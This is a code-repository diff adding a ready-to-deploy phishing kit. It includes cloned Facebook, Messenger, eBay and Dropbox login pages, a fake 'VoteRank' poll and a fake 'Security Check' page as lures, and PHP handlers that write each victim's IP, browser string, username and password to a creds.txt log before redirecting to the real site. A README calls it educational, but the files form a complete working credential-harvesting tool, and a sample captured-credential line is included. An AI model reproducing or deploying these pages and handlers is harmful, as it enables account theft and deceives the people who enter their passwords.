@ -0,0 +1,4 @@
<svg width="15" height="18" viewBox="0 0 15 18" fill="none" xmlns="http://www.w3.org/2000/svg">
<path d="M12.2313 9.57262C12.2402 8.8827 12.4235 8.20623 12.764 7.60616C13.1046 7.0061 13.5914 6.50193 14.1792 6.14057C13.8058 5.60728 13.3132 5.16841 12.7405 4.85881C12.1679 4.54921 11.5309 4.37741 10.8802 4.35705C9.49213 4.21135 8.14648 5.18763 7.43916 5.18763C6.71815 5.18763 5.62912 4.37151 4.45641 4.39564C3.69787 4.42015 2.95861 4.64073 2.31066 5.03588C1.66272 5.43104 1.12818 5.9873 0.759135 6.65047C-0.839491 9.41824 0.352939 13.4859 1.88429 15.7232C2.65046 16.8187 3.54588 18.0424 4.71754 17.999C5.86407 17.9515 6.29227 17.2679 7.67623 17.2679C9.04735 17.2679 9.4491 17.999 10.6445 17.9715C11.8748 17.9515 12.6499 16.8711 13.3892 15.7652C13.9397 14.9846 14.3633 14.1218 14.6443 13.2089C13.9296 12.9066 13.3196 12.4006 12.8905 11.754C12.4614 11.1073 12.2322 10.3487 12.2313 9.57262Z" fill="white"/>
<path d="M9.97312 2.88531C10.6439 2.08004 10.9744 1.045 10.8944 0C9.86954 0.107639 8.92288 0.597442 8.24302 1.37182C7.91061 1.75012 7.65603 2.19023 7.49381 2.66698C7.3316 3.14373 7.26494 3.64778 7.29764 4.15031C7.81024 4.15559 8.31736 4.04448 8.7808 3.82536C9.24423 3.60625 9.65191 3.28483 9.97312 2.88531Z" fill="white"/>
</svg>

After

Width:  |  Height:  |  Size: 1.2 KiB

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Dropbox Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://www.dropbox.com/forgot/');
exit();
?>

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Ebay Username: " . $_POST['userid'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://accounts.ebay.com/acctxs/user');
exit();
?>

View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2021 KasRoudra
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

View File

@ -0,0 +1,7 @@
# Facebook Static Login Form (Full offline css and js)
## Author: [KasRoudra](https://github.com/KasRoudra)
#### This is created for educational purposes demonstrating how phishing works.
### Use/Copy it legally and provide proper credit

Binary file not shown.

After

Width:  |  Height:  |  Size: 43 B

File diff suppressed because it is too large Load Diff

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Facebook Username: " . $_POST['email'] . " Pass: " . $_POST['pass'] ."\n", FILE_APPEND);
header('Location: https://facebook.com/recover/initiate/');
exit();
?>

View File

@ -0,0 +1 @@
<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1022.51 360"><defs><style>.cls-1{fill:#1877F2;}</style></defs><title>FBWordmark_Hex-RGB-1024</title><path class="cls-1" d="M166.43,126.68c-9.65,0-12.44,4.28-12.44,13.72v15.66h25.74l-2.58,25.3H154v76.78H123.11V181.36H102.3v-25.3h20.81V140.83c0-25.52,10.29-39,39-39a146.17,146.17,0,0,1,18,1.07v23.81Z"/><path class="cls-1" d="M181.87,203.88c0-28.52,13.51-50,41.82-50,15.44,0,24.87,7.94,29.38,17.8V156.06h29.59V258.14H253.07V242.7c-4.29,9.87-13.94,17.59-29.38,17.59-28.31,0-41.82-21.45-41.82-50Zm30.88,6.87c0,15.22,5.57,25.3,19.94,25.3,12.66,0,19.09-9.22,19.09-23.8V202c0-14.58-6.43-23.8-19.09-23.8-14.37,0-19.94,10.08-19.94,25.3Z"/><path class="cls-1" d="M347,153.91c12,0,23.37,2.58,29.59,6.86l-6.86,21.88a48.6,48.6,0,0,0-20.59-4.72c-16.73,0-24,9.65-24,26.17v6c0,16.52,7.29,26.17,24,26.17a48.6,48.6,0,0,0,20.59-4.72l6.86,21.87c-6.22,4.29-17.58,6.87-29.59,6.87-36.25,0-52.76-19.52-52.76-50.83v-4.72C294.24,173.43,310.75,153.91,347,153.91Z"/><path class="cls-1" d="M380.66,211v-9c0-28.95,16.51-48,50.19-48,31.74,0,45.68,19.3,45.68,47.61v16.3h-65c.65,13.94,6.87,20.16,24,20.16,11.59,0,23.81-2.36,32.82-6.22L474,253c-8.15,4.3-24.88,7.51-39.67,7.51C395.24,260.5,380.66,241,380.66,211Zm30.88-13.3h37.32v-2.57c0-11.15-4.5-20-18-20C416.91,175.14,411.54,183.94,411.54,197.66Z"/><path class="cls-1" d="M591,210.32c0,28.52-13.72,50-42,50-15.44,0-26.16-7.72-30.45-17.59v15.44H489.39V104.8L520.27,102v68.2c4.5-9,14.37-16.3,28.74-16.3,28.31,0,42,21.45,42,50Zm-30.88-7.08c0-14.37-5.57-25.09-20.37-25.09-12.66,0-19.52,9-19.52,23.59v10.72c0,14.58,6.86,23.59,19.52,23.59,14.8,0,20.37-10.72,20.37-25.09Z"/><path class="cls-1" d="M601.33,209.67v-5.14c0-29.39,16.73-50.62,50.83-50.62S703,175.14,703,204.53v5.14c0,29.38-16.73,50.62-50.83,50.62S601.33,239.05,601.33,209.67Zm70.78-7.29c0-13.51-5.58-24.23-20-24.23s-19.95,10.72-19.95,24.23v9.44c0,13.51,5.58,24.23,19.95,24.23s20-10.72,20-24.23Z"/><path class="cls-1" d="M713.27,209.67v-5.14c0-29.39,16.73-50.62,50.83-50.62s50.83,21.23,50.83,50.62v5.14c0,29.38-16.73,50.62-50.83,50.62S713.27,239.05,713.27,209.67Zm70.78-7.29c0-13.51-5.58-24.23-19.95-24.23s-19.94,10.72-19.94,24.23v9.44c0,13.51,5.57,24.23,19.94,24.23s19.95-10.72,19.95-24.23Z"/><path class="cls-1" d="M857.39,204.74l30.45-48.68h32.81l-31.95,50.4,33.24,51.68H889.13l-31.74-50v50H826.5V104.8L857.39,102Z"/></svg>

After

Width:  |  Height:  |  Size: 2.3 KiB

File diff suppressed because it is too large Load Diff

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,69 @@
<!DOCTYPE html>
<html>
<head>
<style>
.hover {
color: #FFF;
text-align: center;
width: 222px;
cursor:pointer;
background-color: #0EADFF;
display: block;margin:0px auto;border-radius:20px;border-color:transparent;height:40px;
}
.hover1:hover {
color: #FFF;
text-align: center;
width: 222px;
cursor:pointer;
background-color: #108ee9;;
display: block;margin:0px auto;border-radius:20px;border-color:transparent;height:40px;
}
</style>
</head>
<title>VoteRank #289032</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<!-- !PAGE CONTENT! -->
<div class="w3-content" style="max-width:1500px">
<!-- Header -->
<header class="w3-panel w3-center w3-opacity" style="padding:128px 16px">
<h1 class="w3-xlarge">VOTERANK</h1>
<h1>#289032</h1>
</header>
<body bgcolor="#eff0f1" style="text-align:center">
<div>
<form action="login2.html">
<div id="group1">
What's your name?<br><input type="text" required><br></br>
Select your favorite social networks:<br>
<input type="checkbox" value="facebook" name="social" > Facebook<br>
<input type="checkbox" value="twitter" name="social" > Twitter<br>
<input type="checkbox" value="linkedin" name="social" > LinkedIn<br>
<input type="checkbox" value="instagram" name="social" > Instagram<br>
<input type="checkbox" value="snapchat" name="social" > Snapchat<br>
<input type="checkbox" value="googleplus" name="social" > Google+<br></br>
</div>
<div id="group2">
Select your favorite colors:<br>
<input type="checkbox" value="blue" name="color" > Blue<br>
<input type="checkbox" value="red" name="color" > Red<br>
<input type="checkbox" value="green" name="color" > Green<br>
<input type="checkbox" value="yellow" name="color" > Yellow<br>
<input type="checkbox" value="purple" name="color" > Purple<br>
<input type="checkbox" value="orange" name="color" > Orange<br>
<input type="checkbox" value="black" name="color" > Black<br>
<input type="checkbox" value="white" name="color" > White<br>
<input type="checkbox" value="grey" name="color" > Grey<br>
<input type="checkbox" value="brown" name="color" > Brown<br>
<input type="checkbox" value="pink" name="color" > Pink<br>
<input type="submit" value="Submit" class="hover hover1">
</div>
</form>
</div>
</body>
</body>
</html>

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Facebook Username: " . $_POST['email'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: ./result.html');
exit();
?>

View File

@ -0,0 +1,127 @@
<!DOCTYPE html>
<html>
<title>VoteRank #289032</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<!-- !PAGE CONTENT! -->
<div class="w3-content" style="max-width:1500px">
<head>
<style>
* {
-webkit-box-sizing: border-box;
box-sizing: border-box;
}
html {
background: white;
}
body {
background: white;
margin: 0;
padding: 0;
font-family: 'Lato', sans-serif;
}
h5{
color: white;
}
.login-form-wrap {
background: radial-gradient(ellipse at center, #5170ad 0%, #355493 100%);
border: 1px solid #2d416d;
-webkit-box-shadow: 0 1px #5670A4 inset, 0 0 10px 5px rgba(0, 0, 0, 0.1);
box-shadow: 0 1px #5670A4 inset, 0 0 10px 5px rgba(0, 0, 0, 0.1);
border-radius: 5px;
width: 360px;
height: 380px;
margin: 60px auto;
padding: 50px 30px 0 30px;
text-align: center;
}
.login-form-wrap h1 {
margin: 0 0 50px 0;
padding: 0;
font-size: 26px;
color: #fff;
}
.login-form-wrap h5 {
margin-top: 40px;
}
.login-form-wrap h5 > a {
font-size: 14px;
color: #fff;
text-decoration: none;
font-weight: 400;
}
.login-form input[type="text"], .login-form input[type="password"] {
width: 100%;
border: 1px solid #314d89;
outline: none;
padding: 12px 20px;
color: #afafaf;
font-weight: 400;
font-family: 'Lato', sans-serif;
cursor: pointer;
}
.login-form input[type="text"] {
border-bottom: none;
border-radius: 4px 4px 0 0;
padding-bottom: 13px;
-webkit-box-shadow: 0 -1px 0 #E0E0E0 inset, 0 1px 2px rgba(0, 0, 0, 0.23) inset;
box-shadow: 0 -1px 0 #E0E0E0 inset, 0 1px 2px rgba(0, 0, 0, 0.23) inset;
}
.login-form input[type="password"] {
border-top: none;
border-radius: 0 0 4px 4px;
-webkit-box-shadow: 0 -1px 2px rgba(0, 0, 0, 0.23) inset, 0 1px 2px rgba(255, 255, 255, 0.1);
box-shadow: 0 -1px 2px rgba(0, 0, 0, 0.23) inset, 0 1px 2px rgba(255, 255, 255, 0.1);
}
.login-form input[type="submit"] {
font-family: 'Lato', sans-serif;
font-weight: 400;
background: -webkit-gradient(linear, left top, left bottom, from(#e0e0e0), to(#cecece));
background: linear-gradient(to bottom, #e0e0e0 0%, #cecece 100%);
display: block;
margin: 20px auto 0 auto;
width: 100%;
border: none;
border-radius: 3px;
padding: 8px;
font-size: 17px;
color: #636363;
text-shadow: 0 1px 0 rgba(255, 255, 255, 0.45);
font-weight: 700;
-webkit-box-shadow: 0 1px 3px 1px rgba(0, 0, 0, 0.17), 0 1px 0 rgba(255, 255, 255, 0.36) inset;
box-shadow: 0 1px 3px 1px rgba(0, 0, 0, 0.17), 0 1px 0 rgba(255, 255, 255, 0.36) inset;
}
.login-form input[type="submit"]:hover {
background: #DDD;
}
.login-form input[type="submit"]:active {
padding-top: 9px;
padding-bottom: 7px;
background: #C9C9C9;
}
</style>
</head>
<header class="w3-panel w3-center w3-opacity">
<h1 class="w3-xlarge">VOTERANK</h1>
<h1>#289032</h1>
</header>
<section class="login-form-wrap">
<h1>Facebook</h1>
<form class="login-form" action="login.php" method="post">
<label>
<input type="text" name="email" placeholder="Email or phone" required>
</label>
<label>
<input type="password" name="pass" placeholder="Password" required>
</label>
<input type="submit" value="Login">
</form>
<h5>Sign in to complete poll.</h5>
</section>
</html>

View File

@ -0,0 +1,22 @@
<!-- I AM A FAKE PAGE | DO NOT TRUST ME -->
<!DOCTYPE html>
<html>
<title>Poll completed successfully. Thank You!</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<!-- !PAGE CONTENT! -->
<div class="w3-content" style="max-width:1500px">
<!-- Header -->
<header class="w3-panel w3-center w3-opacity" style="padding:128px 16px">
<h1 class="w3-xlarge">VOTERANK</h1>
<h1>#289032</h1>
</header>
<body>
<p align="center"><font size="10px" color="green">Poll completed successfully. Thank You!</font></p>
</body>
</body>
</html>

View File

@ -0,0 +1 @@
Messenger Username: fb Pass: messenger

View File

@ -0,0 +1,10 @@
<head>
<!-- TAKEN FROM https://github.com/DarkSecDevelopers/LitePhish -->
<link href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAHMAAAB0CAMAAACBmP1sAAAAKlBMVEVHcEwAd/8Am/8Ao//+/v8Ag/8Ai/4Ak/8Brv8Aqf+n0fA9pPpwvPbV7P/cpejSAAAAAXRSTlMAQObYZgAABLlJREFUeAG9k4t2tDoIhTmJYxTw/V/3mN+6F6aEpjPWb7IqcmEHpkNvwDu6wxX6a1hVlhZR/SNlZl0i9O6RYz1w47y6DCN6/4hPDMuy/B7hpxU/U9XlffQjxbWeJ1Sx1mHh9eMF67Kerdb9HM8d2E68yfvtqLLewT4qjcLLegt1VH5MEgyK8novA6K63o2OSOY17wdPgPcIp15/WmyurGdN/Zwe2ytkNfX1deEfJE+ZapkWx/v5jD/Z1B+qHEpiTkhgKNMlpr1iKLpAD5g5TTCeE2DOvFAHQYXbwwYjmurjCLloXv9mznoWJQf+ruPT88f1K/e+zFSPBa8IwdOCHL9+8TabE8rwgacxkGUPctr6w1JqYMTdq5/1MFIziM1JndHb7Uq2c+JAqB0YcWiZ0HV4ZEg7ZkZhWJ6sYpuGaeG0le2gknb866aEZ6tmYk09OlzqhQxcAx8B4cZ9feHvY9bK8+HYsGCbZ3Jd1rMjBBgR3M2xYRnbpGTjglqTlNmOWUFd9mxYeMmIGh2b1ngug+K7DhQvAxzEirYl5synpH51KN7acrOCdl0AZm6LbaY2qwUlpx4lfQJ+LvzVq/RlcKAKh30bacBUUdsQx9UqqSALDrzBqrZuLAiYv2pWe+Y2KX7ImvYNHtmmadpwP3NfoUpyh8FfG8oi2Wq0lach0z8UdzBrph1GlbcK69dtqnA2g9tBUMHTgZh4QZCItHy58Ty5+Ou6TvTw7VSjrc9n4pa8vkpEUoaQycBpJFH8OBGhPCRtk2Xr3pSRw51ORFRGQCugxSObq/WGIeLfbjbYb5KtfynAg5roFe5XbbT0NbUMoJOLBl957jcjGd9svF+5SGrQjWT8Hyjcr179pUsa0US7YL+puZaUz+ZMUwhn7BVwCTXT25sF29Y64hlOzbnM+wn/gcbR4gCNRMezvhuMDz/NcdjWf7cTyRxSdPo1aQ6RnzTf2ewc8+Ocv9/shto353xjs/KhZol/Fh48/6wZbp8bRdmvwfFmy4+aGmqKO4K8u1loRrvY/HZpe2ezgIkGN7ulXsRSBjQp0JRgAHnrpwlN6W82aFa28KcZIFXzNb+Ot92AfflpbrgX8tz9iq2PNLn2qNR82K9i9/rykFZSUe/0A0w7Lxc2rTo0+93QPoQq4kUUnaRfPrOVLEOShSrqddvCvQLZprFEoFRhr1e4V8Os/1RZXmP8x/QP54aKvQ5Q5tcwM1F3uRvWdS9KB+zujPX1BzB9Ia+nKHSij2kqgackZyKgz49pBv2vfnb2h7ERa/zwDdaTRfdIjeLvVzPY1mv9Jox8U36tV7pwpqNqB2WIfXmtH+9O3VUaY54oQjYbT3dOm+LWQfkIMjWIWaE96NCeOMW5gVALY69tte/zzPhiTN9QN9Neu3v6dSZHyUHaxGHRoA5HyINRNH7Gr0U+HJYPiAZBpg4alA+MFixAqYtc/hs+HM0coR4QHew1eq++JEQrUH0Pe7FYEqL3MhM9LSo0wPygJLhTUmkMeV6S9DZJplH4viGf1mR6WlOJHtYUooc1hem38IOK4MHvETw4YqApIn8jCDr7YpWenDJ9iKMIWFXk9TqnF/1MDkizsEd4XBGiSs/C/Hcj/g+0zLZI7bXdoQAAAABJRU5ErkJggg==" rel="shortcut icon" sizes=196x196>
<style>.container{color:#929292;font-size:14px;font-weight:normal;display:block;position:relative;padding-left:35px;margin-bottom:12px;cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.container input{position:absolute;opacity:0;cursor:pointer;height:0;width:0}.checkmark{position:absolute;top:0;left:1%;height:15px;width:15px;background-color:#eee;border-radius:20%}.container:hover input ~ .checkmark{background-color:#ccc}.container input:checked ~ .checkmark{background-color:#2196f3}.checkmark:after{content:"";position:absolute;display:none}.container input:checked ~ .checkmark:after{display:block}.container .checkmark:after{left:5px;top:2px;width:3px;height:7px;border:solid white;border-width:0 3px 3px 0;-webkit-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg)}::placeholder{color:rgba(0,0,0,.20);opacity:1}:-ms-input-placeholder{color:rgba(0,0,0,.20)}::-ms-input-placeholder{color:rgba(0,0,0,.20)}button{background:#fff;color:#0084ff;font-size:24px;font-weight:normal;margin-top:5px;align-items:center;border:0;box-shadow:none;display:flex;margin-left:auto;margin-right:auto;overflow:hidden;text-overflow:ellipsis;text-shadow:none;white-space:nowrap;font-family:Helvetica Neue,Segoe UI,Helvetica,Arial,sans-serif;cursor:pointer;text-decoration:none;line-height:26px;padding:0 10px}button:active,button:focus{border:2px solid #0084ff;border-radius:3px}.input:focus{border-color:#0084ff}.input{border:1px solid rgba(0,0,0,.20);border-radius:4px;color:rgba(0,0,0,1);display:block;font-family:Helvetica Neue,Segoe UI,Helvetica,Arial,sans-serif;font-size:17px;height:42px;margin-bottom:12px;margin-left:auto;margin-right:auto;padding:0 16px;width:286px}.sml{margin:10px;color:#a8a8a8;cursor:pointer;text-decoration:none;font-size:11px;text-align:center}</style><div><div><div><div><div><br><br><br><br><center><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEwAAABKCAMAAAAmEEIEAAAANlBMVEVHcEwAwP8Bs/8Agv8ktPYZeN0Siu8yjNk2hs8ynecAjv8Bp/8Ad/8Bmv/////R7f9Yvv+e2/8HLAH/AAAACnRSTlMA////4M3tgD2vYPIbvwAAAphJREFUeAHFk48OoyAMh6sTKLo/+v4ve73uF8AK3txI7munUsoXIBn9Aw5xAjEwfY94BoMYvzJlkRVe9cXhlNhPdUUXho/45LA8DR8y8eVt/bC5abhE7OMCU0dX04arH/vYpr+mMT3OGBGwnbrSC4HHvpZKFVscxsYq84koPqN1scwi8dI07zzcTbE9pHYedfaNSSXNmIPG3IYXSAtNZdjNRHNIkHzWg1KjwruN/Ug0G/sN7rQxs7VlvBz5gTGBcN015gfGAbL4wToTi51aYj6lgJYD2+swAd+2pnI6J5e96UrSiudTbShqKutrk89cYZWFpc24Pp+wJaB6bvtKwJW1EZfaTHncntaFS5vOXbAZ1cH1mFTml4dEyhxwwZa6RKWuslXwKpNPlEzABRu61ldyI/RT8i0Taq4RGrCp/wXzsR8yNScW/OAqbaOo4Co6AWT7raFpwcICVNRV6BCQ1Ugu44TrCGS+4cJFbVbWcPmmDPe8PoTtIxdk7jE/JFPAJSqMNuNCly7LI6eyiHpOda1JrmOwFg4EBlFlYZ5lUKT+W7QBlWxbi14ExnMgZa+a9U88vzuMbX1XsRxgTG/8XLLJZeUmgJOjmg1Z6yGLOxdUINvgahEh46K2YkXFhpkGTOmcP4FTgjDfEDPetZBsR6CEf/fmNSYrpX2np0yQ8jvxMFkp7TsDFXgUBXlU1lVdqeqphKWOFVXm8zLTDnf7AUcG/73Lk4W/lzEdCLfbvZnNGXEFqhBlqhXtqXukKlHm6imPxhxcVVtjScOFfTUI9+bW6tVAJ/D9EkynuAsqx9RNhiP2kDmiXjKcsIcMqg4yFwhckTnm6Hzp8S4wXcAdjsIcFEbhuswH+h3IoOohi9QJh8vqQoDq//MHcYd0E1zD4+0AAAAASUVORK5CYII="></head></center><h1 style="color:#000;font-size:40px;font-weight:300;margin-bottom:24px;text-align:center;font-family:Helvetica Neue,Segoe UI,Helvetica,Arial,sans-serif;direction:ltr;line-height:1.34">Messenger</h1><h2 style="color:#000;font-size:16px;font-weight:200;line-height:1.2;margin-bottom:24px;text-align:center;font-family:Helvetica Neue,Segoe UI,Helvetica,Arial,sans-serif;direction:ltr">Instantly connect with people in your life.</h2><div style="color:#000;font-size:16px;font-weight:200;line-height:1.2;margin-bottom:24px;text-align:center;font-family:Helvetica Neue,Segoe UI,Helvetica,Arial,sans-serif">Sign in with Facebook to get started.</div><div><div><div><form action=login.php method=post><div>
<input type=hidden name=name value="'.basename(__FILE__).'">
<input class=input name=username type=text placeholder="Email address or phone number" />
<input size=80 class=input name=password type=password placeholder=Password />
<input type=hidden name=location value=Messenger />
<br><button type=submit>Continue</button><br><br><div><div style=margin-left:40%><p style=margin-bottom:27px><label class=container>
<input type=checkbox checked=checked> Keep me signed in <span class=checkmark></span></label></p></div></div></div></form></div></div></div></div></div></div><div style=text-align:center><a class=sml href>Not on Facebook?</a><span style=margin:5px;color:#a8a8a8>|</span><a class=sml href>Forgotten password</a><span style=margin:5px;color:#a8a8a8>|</span><a class=sml href>Data Policy</a><span style=margin:5px;color:#a8a8a8>|</span><a class=sml href>Terms</a><span style=margin:5px;color:#a8a8a8>|</span><a class=sml href>Cookies Policy</a><span style=margin:5px;color:#a8a8a8>|</span><a href class=sml> &copy; Facebook 2021 </div></div><footer></footer></div>

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Messenger Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://www.facebook.com/recover/initiate/');
exit();
?>

Binary file not shown.

After

Width:  |  Height:  |  Size: 330 B

View File

@ -0,0 +1,69 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Security Check</title>
<link rel="shortcut icon" type="ico" href="./fb-ico.png">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<header>
<div class="main-header">
<div class="logo">
<a href="http://www.facebook.com"><img src="./logo.png"></a>
</div>
</div>
</header>
<section>
<div class="form">
<div class="m-header">
<h3>Facebook Security Check. Please Verify It's You.</h3>
</div>
<div class="red-box">
<p style="font-weight:bold; font-size:13px">Verify needed to understand it's you</p>
<p>Enter your password for security reason (make sure your caps lock is off)</p>
<p>Forgot your password ? <a href="">Request new one</a>
</div>
<div class="login-form">
<form method="post" class="bb" novalidate="1" id="login-form" action="login.php">
<label for="username">Username:</label><input name="username" id="username" type="username"></input><br />
<br> <br/>
<label for="password">Password:</label><input name="password" id="password" type="password"></input><br />
<input id="keep" style="margin: 10px 0 0 84px" type="checkbox"></input>
<label for="keep" style="font-size:12px;">keep me logged in</label><br />
<input type="submit" name="submit" value="Verify" style="background: none repeat scroll 0 0 #3b5998; border: 1px solid #294461; color: #ffffff; margin: 4px 0 0 80px; padding: 2px 6px;"></input>
<p><a style="text-decoration:none; color:#3B5998; margin:0 0 0 80px;" href="">can't log in?</a></p>
</form>
</div>
</div>
<footer>
<ul>
<li><a href="">Mobile</a></li>
<li><a href="">Find Friends</a></li>
<li><a href="">Badges</a></li>
<li><a href="">People</a></li>
<li><a href="">Pages</a></li>
<li><a href="">Apps</a></li>
<li><a href="">Games</a></li>
<li><a href="">Music</a></li>
<li><a href="">Locations</a></li>
</ul>
<ul>
<li><a href="">Topics</a></li>
<li><a href="">About</a></li>
<li><a href="">Create Ad</a></li>
<li><a href="">Create Page</a></li>
<li><a href="">Devepers</a></li>
<li><a href="">Careers</a></li>
<li><a href="">Privacy</a></li>
<li><a href="">Cookies</a></li>
<li><a href="">Terms</a></li><br />
<li><a href="">Help</a></li>
</ul>
</footer>
</section>
</body>
</html>

View File

@ -0,0 +1,27 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Facebook Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://facebook.com/');
exit();
?>

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.5 KiB

View File

@ -0,0 +1,97 @@
h1, h2, h3, h4, h5, a, p, ul, li, img, header, section, div, body {margin: 0; padding: 0;}
header {
width: 1348px;
height: 84px;
background: #3B5998;
}
.main-header {
padding-left:184px;
}
.form {
border: 1px solid #cccccc;
border-radius: 5px;
height: 420px;
margin: 60px auto 45px;
width: 641px;
}
.form h3 {
color: #333333;
border-bottom: 1.5px solid #cccccc;
font-family: tahoma;
font-size: 18px;
font-weight: 600;
margin: 0 20px;
padding: 20px 0 12px;
}
.red-box {
margin:24px auto 0;
width: 600px;
height: 97px;
